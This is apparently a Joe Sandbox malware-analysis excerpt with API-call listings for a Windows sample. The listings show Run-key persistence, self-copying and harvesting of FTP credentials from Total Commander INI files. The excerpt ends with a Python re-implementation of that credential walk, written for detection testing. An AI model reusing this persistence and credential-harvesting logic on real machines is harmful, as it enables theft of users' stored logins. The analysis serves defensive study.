                            • Part of subcall function 004069FD: RegCreateKeyExW.ADVAPI32(0040EA48,00000000,00000000,00000000,00000000,00020006,00000000,00000002,0040EA48,?,?,?,?,00406AD3,80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current), ref: 00406A22
                          • GetLastError.KERNEL32(00000004), ref: 0040B3CA
                          • Sleep.KERNEL32(00002710), ref: 0040B3F7
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B413
                          • CopyFileW.KERNEL32(?,?,00000000), ref: 0040B435
                          • ExitProcess.KERNEL32 ref: 0040B44D
                            • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,771B0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
                            • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
                          • GetLastError.KERNEL32(00000004), ref: 0040B48D
                          • GetLastError.KERNEL32(00000004), ref: 0040B49A
                          • ExpandEnvironmentStringsW.KERNEL32(?,00000400), ref: 0040B4C7
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B4D7
                          • GetLastError.KERNEL32(00000004), ref: 0040B500
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$ErrorLastModuleName$Open$CopyCreateEnvironmentExitExpandProcessSleepStrings
                          • String ID: /nomove$IueiOod$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$opeqmc.exe
                          • API String ID: 3692109554-477663111
                          • Opcode ID: 55bb52feb6c62d8aec5773147cbc2c373a20a80f20ddf5eadf9f4fa8ccd6a04a
                          • Instruction ID: ccf8aad4361994264e72a39918ed7d53ff083e628d4a69ee62a5d407c68d8035
                          • Opcode Fuzzy Hash: 55bb52feb6c62d8aec5773147cbc2c373a20a80f20ddf5eadf9f4fa8ccd6a04a
                          • Instruction Fuzzy Hash: 8C4127719042186AE710B7A19D46FAB73ACEF04345F14447BBB05F11C2EB789A548AAF

                          Control-flow Graph

                          APIs
                          • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000400), ref: 004075FC
                          • CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618
                          • GetFileSize.KERNEL32(?,00000000), ref: 0040762E
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407638
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0040763F
                          • ReadFile.KERNELBASE(?,00000000,00000000,?,00000000), ref: 00407660
                          • WriteFile.KERNELBASE(?,?,00000000,?,00000000), ref: 0040767F
                          • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000), ref: 00407691
                          • ReadFile.KERNELBASE(?,?,00000040,?,00000000), ref: 004076A1
                          • SetFilePointer.KERNELBASE(?,?,00000000,00000000), ref: 004076AF
                          • ReadFile.KERNELBASE(?,?,000000F8,?,00000000), ref: 004076C5
                          • SetFilePointer.KERNELBASE(?,?,00000000,00000000), ref: 004076EF
                          • WriteFile.KERNELBASE(?,?,000000F8,?,00000000), ref: 00407705
                          • CloseHandle.KERNELBASE(?), ref: 00407714
                          • CloseHandle.KERNEL32(?), ref: 00407719
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$PointerRead$CloseCreateHandleHeapWrite$AllocateProcessSize
                          • String ID:
                          • API String ID: 2296163861-0
                          • Opcode ID: 894f1e02061cece153af19de11902bbae5fe70548c4ece14d410128547cdf08b
                          • Instruction ID: 7ae3b020874f099f6a4231377d147a855b3f50186be4225f3fece46b7b724b47
                          • Opcode Fuzzy Hash: 894f1e02061cece153af19de11902bbae5fe70548c4ece14d410128547cdf08b
                          • Instruction Fuzzy Hash: F0416A71901028BADB209BA2DD48EEFBF7DEF45390F104476F619F21A0D7709A10DB64

Control-flow Graph
                          control_flow_graph 73 40ac20-40ac48 RegOpenKeyExW 74 40ac60-40ac76 RegOpenKeyExW 73->74 75 40ac4a-40ac55 call 4069c0 73->75 76 40ac78-40ac7a 74->76 77 40ac7c-40ac87 call 4069c0 74->77 81 40ac5a-40ac5e 75->81 79 40ac8e-40ac92 76->79 82 40ac8c-40ac8d 77->82 81->74 81->79 82->79
                          APIs
                          • RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,771B0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
                          • RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
                            • Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                            • Part of subcall function 004069C0: RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Open$CloseQueryValue
                          • String ID: /nomove$IueiOod$SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                          • API String ID: 3546245721-4228964922
                          • Opcode ID: e183a9483fa9f7ba9bb43204af9f8e84b77f88267b9ccf7be8296576afd26502
                          • Instruction ID: 3bac8edf5f415b784fe4546894dc74dc09b9405a13c640cee1cd261e7a9a2bb6
                          • Opcode Fuzzy Hash: e183a9483fa9f7ba9bb43204af9f8e84b77f88267b9ccf7be8296576afd26502
                          • Instruction Fuzzy Hash: 5F01867265430EFEFF1096919D42F9A736CDB40768F210036FA00B60D1D6B6AE155779

                          Control-flow Graph

                          APIs
                          • GetCommandLineW.KERNEL32(?,0040B3E5), ref: 0040AB0A
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000820,00000400,?,0040B3E5), ref: 0040AB44
                          • CharLowerW.USER32(?,?,0040B3E5), ref: 0040AB57
                          • CharLowerW.USER32(?,?,0040B3E5), ref: 0040AB60
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CharLower$CommandFileLineModuleName
                          • String ID: /nomove
                          • API String ID: 1338073227-1111986840
                          • Opcode ID: 00c7a09b5e38cd9dc17e43fc8aab8f350de87f2bf6048177a511846302a86bad
                          • Instruction ID: b8029fc6669f79c45f6caaa8ce38406425976cf3cabd4088da44db58d281c6d8
                          • Opcode Fuzzy Hash: 00c7a09b5e38cd9dc17e43fc8aab8f350de87f2bf6048177a511846302a86bad
                          • Instruction Fuzzy Hash: 7CF01D7290022956DB10A7B19C05BDB72ACFF40309F0445B6AA05F2180ED78EA548F95

Control-flow Graph
                          control_flow_graph 96 407727-407751 call 40d5b0 GetModuleFileNameW 99 407753-40776b call 4075d4 96->99 100 40776d-40776e 96->100 105 4077e1-4077ea 99->105 102 407774-407797 ExpandEnvironmentStringsW call 4075d4 100->102 106 40779c-4077a0 102->106 107 4077a2-4077a5 106->107 108 4077eb-4077ee 106->108 110 4077b7-4077ba 107->110 111 4077a7-4077b5 GetLastError 107->111 109 4077e0 108->109 109->105 112 4077d2-4077dc 110->112 113 4077bc-4077c8 GetLastError 110->113 114 4077ca-4077cf call 40a786 111->114 112->102 116 4077de 112->116 113->114 114->112 116->109
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400,771B0900,00000400,00000000,0040B4B3,00000000), ref: 00407744
                          • ExpandEnvironmentStringsW.KERNEL32(?,00000400), ref: 00407784
                          • GetLastError.KERNEL32(00000004), ref: 004077A9
                            • Part of subcall function 004075D4: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000400), ref: 004075FC
                            • Part of subcall function 004075D4: CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$Create$EnvironmentErrorExpandLastModuleNameStrings
                          • String ID:
                          • API String ID: 1536607067-0
                          • Opcode ID: eafcbf4a8c3930913d522f5c7b72beb30a71f0d0c1af5e3f4189f884763461bb
                          • Instruction ID: de8f4f1c442ba604be96c6aabbb627c7d922d162aa2fadd5385f895ae0141ebd
                          • Opcode Fuzzy Hash: eafcbf4a8c3930913d522f5c7b72beb30a71f0d0c1af5e3f4189f884763461bb
                          • Instruction Fuzzy Hash: AD11E972908249AED720D7A19C81FEB739CFB44354F10483BFB95E30D0E678B945866B

Control-flow Graph
                          control_flow_graph 118 4077f0-407829 call 40d530 CreateProcessW
                          APIs
                          • _memset.LIBCMT ref: 00407800
                          • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,?,?,?,?,00000400), ref: 0040781B
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CreateProcess_memset
                          • String ID:
                          • API String ID: 1177741608-0
                          • Opcode ID: 0cd9a43e4f1b4c0064b4bee2692f9063eedacf03e95d61430481666f95000588
                          • Instruction ID: 3694313203bda926a09df6f19e1a61ce713b6a49f930e6e3ed03be73a1123fdc
                          • Opcode Fuzzy Hash: 0cd9a43e4f1b4c0064b4bee2692f9063eedacf03e95d61430481666f95000588
                          • Instruction Fuzzy Hash: 1DE048B294113876DB20A6E69C0DDDF7F6CDF06694F000121BA0EE50C4E5749608C6F5

Control-flow Graph
                          control_flow_graph 128 4069c0-4069fc RegQueryValueExW RegCloseKey
                          APIs
                          • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                          • RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CloseQueryValue
                          • String ID:
                          • API String ID: 3356406503-0
                          • Opcode ID: 149707b6f704b0206dcd429f7e61dcdc4ff4cc903c0dfabc6e5b0404234ae6db
                          • Instruction ID: 7cb27e63b8b96f7a1a34dd7d249ffcc2d4336ce0f7aa5f451266b78b49120899
                          • Opcode Fuzzy Hash: 149707b6f704b0206dcd429f7e61dcdc4ff4cc903c0dfabc6e5b0404234ae6db
                          • Instruction Fuzzy Hash: DCE06D7A000208BBEF104F94CD09BD97BB9EB44358F208464BA00A6150D67596149B14

Control-flow Graph
                          control_flow_graph 129 4039ea-403a14 HeapAlloc 130 403bba-403bbe 129->130 131 403a1a-403a30 GetPrivateProfileStringW 129->131 132 403bb3-403bb9 call 40be3a 131->132 133 403a36-403a42 call 40c475 131->133 132->130 133->132 138 403a48-403a5e HeapAlloc 133->138 138->132 139 403a64-403ac3 call 405511 * 5 138->139 150 403ac8-403ad7 StrStrIW 139->150 151 403b93-403ba3 call 40c495 150->151 152 403add-403aec StrStrIW 150->152 151->150 158 403ba9-403bb2 call 40be3a 151->158 152->151 153 403af2-403b03 GetPrivateProfileStringW 152->153 153->151 155 403b09-403b24 GetPrivateProfileStringW 153->155 155->151 157 403b26-403b3a GetPrivateProfileStringW 155->157 157->151 159 403b3c-403b47 call 403877 157->159 158->132 159->151 164 403b49-403b7b call 405511 call 40c3f9 159->164 169 403b90 164->169 170 403b7d-403b8b call 40c00b 164->170 169->151 170->169 173 403b8d 170->173 173->169
                          APIs
                          • HeapAlloc.KERNEL32(00000008,00020002,?,00000104,SOFTWARE\Ghisler\Total Commander), ref: 00403A09
                          • GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00403A2C
                          • HeapAlloc.KERNEL32(00000008,00000C0C), ref: 00403A55
                          • StrStrIW.SHLWAPI(?,?), ref: 00403ACF
                          • StrStrIW.SHLWAPI(?,?), ref: 00403AE4
                          • GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403AFF
                          • GetPrivateProfileStringW.KERNEL32(?,?,00000000,000001FE,000000FF,?), ref: 00403B20
                          • GetPrivateProfileStringW.KERNEL32(?,?,00000000,?,000000FF,?), ref: 00403B36
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: PrivateProfileString$AllocHeap
                          • String ID: SOFTWARE\Ghisler\Total Commander$connections$default$ftp://%s:%s@%s$host$password$username
                          • API String ID: 2479592106-2015850556
                          • Opcode ID: c368ffed181334e4a999fe46bdaddc7fa5d9e929cd71afacdc90b45fbd8a1971
                          • Instruction ID: 106d3b010c48b16868dcb071ba678aa04ac33b338b72d514ced31169f03d36dc
                          • Opcode Fuzzy Hash: c368ffed181334e4a999fe46bdaddc7fa5d9e929cd71afacdc90b45fbd8a1971
                          • Instruction Fuzzy Hash: A2513D71900109BAEB11EFA5DD41EAEBBBDEF44308F204077E904F6292D775AF068B58

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00406A68: RegOpenKeyExW.ADVAPI32(80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current,00000000,00000001,?,00420840,?,00000000), ref: 00406A8C
                            • Part of subcall function 00406ADF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00420840,?,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182), ref: 00406B2A
                          • GetSystemMetrics.USER32(00000000), ref: 004032E5
                          • GetSystemMetrics.USER32(00000001), ref: 004032ED
                          • VirtualProtect.KERNEL32(75A90B80,0000000A,00000008,?,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403309
                          • VirtualProtect.KERNEL32(75A90B88,0000000A,?,?,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403333
                          • SetUnhandledExceptionFilter.KERNEL32(004032AF,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 0040333A
                          • LoadLibraryW.KERNEL32(atl,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403345
                          • GetProcAddress.KERNEL32(00000000,AtlAxWinInit), ref: 0040335D
                          • GetProcAddress.KERNEL32(00000000,AtlAxAttachControl), ref: 0040336A
                          • GetProcAddress.KERNEL32(00000000,AtlAxGetControl), ref: 00403377
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressProc$MetricsOpenProtectSystemVirtual$ExceptionFilterLibraryLoadUnhandled
                          • String ID: AtlAxAttachControl$AtlAxGetControl$AtlAxWinInit$atl
                          • API String ID: 3066332896-2664446222
                          • Opcode ID: fe1f50a485c472adffca313bd216073f3c2af1e46121dbe202f23b587a8dcd22
                          • Instruction ID: 61d9a237d914756188f526d52bf2e891562662c8e4878cb3977fb5d3c9d5a9bd
                          • Opcode Fuzzy Hash: fe1f50a485c472adffca313bd216073f3c2af1e46121dbe202f23b587a8dcd22
                          • Instruction Fuzzy Hash: E6212771900390EED3019FBAAD84A5A7FE8EB5B31171545BBE556F32A0C7B80902CB79
                          APIs
                            • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C
                          • HeapAlloc.KERNEL32(00000008,00020002), ref: 00403566
                          • GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 0040358A
                          • HeapAlloc.KERNEL32(00000008,00000C20), ref: 004035B5
                          • GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403639
                          • GetPrivateProfileIntW.KERNEL32(?,?,00000015,?), ref: 00403653
                          • GetPrivateProfileStringW.KERNEL32(?,?,00000000,-000001FE,000000FF,?), ref: 00403681
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: PrivateProfile$String$AllocHeap$CombinePath
                          • String ID: ftp://%s:%s@%s:%u$pass$port$user
                          • API String ID: 3432043379-2696999094
                          • Opcode ID: 44b7e08f2b4d95bd69ae67f2fadcfc6b29273b9b05256415c6f2e19ab8e382dd
                          • Instruction ID: ca29095f8650abd3188745a74e72d347e34b1f07fc40ddfd65b33f15b90f053b
                          • Opcode Fuzzy Hash: 44b7e08f2b4d95bd69ae67f2fadcfc6b29273b9b05256415c6f2e19ab8e382dd
                          • Instruction Fuzzy Hash: D3515FB2104606AFE710EF61DC81EABBBEDEB88304F10493BF554A32D1D735DA058B56
                          APIs
                            • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C
                          • FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                          • PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                          • Sleep.KERNEL32(00000000), ref: 00408342
                          • Sleep.KERNEL32(00000000), ref: 00408377
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                          • FindClose.KERNEL32(00000000), ref: 004083B9
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Find$FilePathSleep$CloseCombineFirstMatchNextObjectSingleSpecWait
                          • String ID: .$.$.8@$.8@
                          • API String ID: 2348139788-2639049386
                          • Opcode ID: 6239f567dea19bf0f1c0472067baa2396414c83c3cbbf53e1e63fbac9dc8ae5f
                          • Instruction ID: 14d48cc84805742e6106b0fbd309534a1a80b5d2ede52edf6fcc6a53e93a4421
                          • Opcode Fuzzy Hash: 6239f567dea19bf0f1c0472067baa2396414c83c3cbbf53e1e63fbac9dc8ae5f
                          • Instruction Fuzzy Hash: 35414F3140021DABCF219F50DE49BDE7B79AF84708F0401BAFD84B11A1EB7A9DA5CB59
                          APIs
                          • IsDebuggerPresent.KERNEL32 ref: 0040D0C4
                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040D0D9
                          • UnhandledExceptionFilter.KERNEL32(0040E248), ref: 0040D0E4
                          • GetCurrentProcess.KERNEL32(C0000409), ref: 0040D100
                          • TerminateProcess.KERNEL32(00000000), ref: 0040D107
                            (This exact sequence, ending in TerminateProcess with exit status C0000409 = STATUS_STACK_BUFFER_OVERRUN, is the MSVC CRT's /GS stack-cookie failure handler, __report_gsfailure, which is compiled into every module built with /GS. The IsDebuggerPresent call in it is CRT boilerplate, so this function on its own is not evidence of deliberate anti-debugging; weigh the IsDebuggerPresent signature for this sample accordingly.)
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                          • String ID:
                          • API String ID: 2579439406-0
                          • Opcode ID: 1b5eef82b17558b1403b6a949654a497de19b842f61d59b3835a6f2e4e548581
                          • Instruction ID: 078c109d1665b9b830d76e00ceeb27c9797f204ae48b5850d213398ac2e03a3c
                          • Opcode Fuzzy Hash: 1b5eef82b17558b1403b6a949654a497de19b842f61d59b3835a6f2e4e548581
                          • Instruction Fuzzy Hash: 7F21CEB8801244DFD700DF59F945A857BF4BB08385F0086BAE708E76B0E7B458808F0D

                          Control-flow Graph
                          (rendered graph not reproduced; basic-block listing omitted. API nodes recoverable from the graph for the function starting at 0040B096: GetModuleFileNameW, GetCurrentDirectoryW, InternetSetPerSiteCookieDecisionW, InternetClearAllPerSiteCookieDecisions, GetLastError, CreateThread, WaitForMultipleObjects, CloseHandle)
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,00420840,00001000,00000000,00000000,00000000,?,0040B320,00000000,?,0040B3E0), ref: 0040B103
                          • InternetSetPerSiteCookieDecisionW.WININET(begun.ru,00000005), ref: 0040B16F (decision 5 = COOKIE_STATE_REJECT, i.e. cookies from begun.ru are refused; note the matching InternetClearAllPerSiteCookieDecisions call on the other branch of this function)
                          • GetLastError.KERNEL32(00000004,?,0040B320,00000000,?,0040B3E0), ref: 0040B188
                          • CreateThread.KERNEL32(00000000,00000000,Function_0000B023,?,00000000,00000000), ref: 0040B1C3
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CookieCreateDecisionErrorFileInternetLastModuleNameSiteThread
                          • String ID: \netprotdrvss.exe$begun.ru
                          • API String ID: 2887986221-2660752650
                          • Opcode ID: ad6e69e745eb0134cfaa1d61605679bf99b5aa58cc3a10e76cbc4c8091dfe4a8
                          • Instruction ID: dc85dbecd2d93a1c92e95c54703b850062b4355e184197ecdf44903e32880826
                          • Opcode Fuzzy Hash: ad6e69e745eb0134cfaa1d61605679bf99b5aa58cc3a10e76cbc4c8091dfe4a8
                          • Instruction Fuzzy Hash: 4351F571A00218BBEB206F65DC89AAF3769EB44349F00447BF904BA1D1D77C8D51CBAE

                          Control-flow Graph
                          (rendered graph not reproduced; basic-block listing omitted. API nodes recoverable from the graph for the function starting at 00403C10: ExpandEnvironmentStringsW (two call sites), PathRemoveFileSpecW, SHGetFolderPathW)
                          APIs
                            • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00403C84
                            • Part of subcall function 004039EA: HeapAlloc.KERNEL32(00000008,00020002,?,00000104,SOFTWARE\Ghisler\Total Commander), ref: 00403A09
                            • Part of subcall function 004039EA: GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00403A2C
                            • Part of subcall function 004039EA: HeapAlloc.KERNEL32(00000008,00000C0C), ref: 00403A55
                            • Part of subcall function 004039EA: StrStrIW.SHLWAPI(?,?), ref: 00403ACF
                            • Part of subcall function 004039EA: StrStrIW.SHLWAPI(?,?), ref: 00403AE4
                            • Part of subcall function 004039EA: GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403AFF
                          • PathRemoveFileSpecW.SHLWAPI(?), ref: 00403CA3
                            • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                          • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?), ref: 00403D2C
                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00403DDF
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Heap$AllocEnvironmentExpandPathPrivateProfileStringStrings$FileFolderFreeOpenRemoveSpec
                          • String ID: #$$$&$*ghisler*$*total*commander*$*totalcmd*$SOFTWARE\Ghisler\Total Commander$ftpininame$installdir
                          • API String ID: 2046068145-3914982127
                          • Opcode ID: c15ee81aaaa02f11a0fa42fc104bb7fecd640ca8150ae48875d07a4d52372b20
                          • Instruction ID: e3ad36e3959a395177e0e2b587ea9ce0600459653a05a841f57562a17ae86195
                          • Opcode Fuzzy Hash: c15ee81aaaa02f11a0fa42fc104bb7fecd640ca8150ae48875d07a4d52372b20
                          • Instruction Fuzzy Hash: AF516D72D0010CABDB10DAA1DC85FDF77BCEB44305F1044BBE515F2181EA789B898B65
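                          The three INI functions above add up to one collector: the host/username/password walk that formats ftp://%s:%s@%s, the user/pass/port walk that formats ftp://%s:%s@%s:%u, and the Total Commander locator that reads installdir/ftpininame under SOFTWARE\Ghisler\Total Commander, expands environment strings and falls back to SHGetFolderPathW with CSIDL 0x24 (CSIDL_WINDOWS). In both walks the first GetPrivateProfileStringW call passes NULL for the section and key, which by Win32 semantics returns every section name; the per-section reads follow, and GetPrivateProfileIntW is called with default 0x15, so a missing port becomes 21. The Python below is an added example written for this report, not code recovered from the sample or produced by Joe Sandbox. It re-implements that walk so a defender can generate, from a known test file, the exact ftp:// strings the collector would build and feed them to network or DLP detections. Assumptions, none of which the listing settles: sections without a host key (first walk) or user key (second walk) produce no entry; in the second walk the section name is used as the host, because user, pass and port are the only key names the report lists for that function; the INI texts are constructed samples, not the real wcx_ftp.ini layout; and the password value is taken verbatim, since none of the listed calls decodes it.

```python
"""INI credential walk, re-implemented for analysis and detection testing.
Added example for this report; not code recovered from the sample.

Mirrors the GetPrivateProfileString semantics the sample relies on:
  * lpAppName = NULL returns all section names (first call in each function),
  * section and key names are case-insensitive, first match wins,
  * a value wrapped in matching quotes is returned without the quotes,
  * GetPrivateProfileInt returns the default when the key is absent
    and 0 when the value is not numeric (decimal only here).
"""


def _parse(ini_text):
    """Return (ordered section names, {section.lower(): {key.lower(): value}})."""
    sections, table, current = [], {}, None
    for raw in ini_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            name = line[1:-1].strip()
            current = name.lower()
            if current not in table:
                sections.append(name)
                table[current] = {}
            continue
        if current is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        key, value = key.strip().lower(), value.strip()
        if len(value) >= 2 and value[0] == value[-1] and value[0] in "\"'":
            value = value[1:-1]
        table[current].setdefault(key, value)  # first occurrence wins
    return sections, table


def ini_sections(ini_text):
    """GetPrivateProfileStringW(NULL, NULL, ...): every section name."""
    return _parse(ini_text)[0]


def ini_get(ini_text, section, key, default=""):
    """GetPrivateProfileStringW(section, key, default, ...)."""
    return _parse(ini_text)[1].get(section.lower(), {}).get(key.lower(), default)


def ini_get_int(ini_text, section, key, default):
    """GetPrivateProfileIntW(section, key, default, ...)."""
    value = ini_get(ini_text, section, key, None)
    if value is None:
        return default
    digits = ""
    for ch in value:
        if not ch.isdigit():
            break
        digits += ch
    return int(digits) if digits else 0


def harvest_host_style(ini_text):
    """host/username/password per section -> ftp://%s:%s@%s (first function)."""
    urls = []
    for section in ini_sections(ini_text):
        host = ini_get(ini_text, section, "host")
        if not host:  # assumption: no host key, no entry
            continue
        user = ini_get(ini_text, section, "username")
        password = ini_get(ini_text, section, "password")  # verbatim, as in the listing
        urls.append("ftp://%s:%s@%s" % (user, password, host))
    return urls


def harvest_port_style(ini_text):
    """user/pass/port per section -> ftp://%s:%s@%s:%u (second function).
    Assumption: the section name is the host; user, pass and port are the
    only key names the report lists for that function."""
    urls = []
    for section in ini_sections(ini_text):
        user = ini_get(ini_text, section, "user", None)
        if user is None:  # assumption: no user key, no entry
            continue
        password = ini_get(ini_text, section, "pass")
        port = ini_get_int(ini_text, section, "port", 21)  # 0x15 default in the listing
        urls.append("ftp://%s:%s@%s:%u" % (user, password, section, port))
    return urls


# Constructed sample files; the real wcx_ftp.ini layout is not shown in the report.
SAMPLE_HOST_STYLE_INI = """\
[connections]
default=build-server
[build-server]
host=ftp.build.example
username=deploy
password="ENC:7f3a91"
[mirror]
HOST=ftp.mirror.example
Username=anon
Password=
"""

SAMPLE_PORT_STYLE_INI = """\
[ftp.intranet.example]
user=svc_backup
pass=hunter2
port=2121
[ftp.legacy.example]
user=admin
pass=admin
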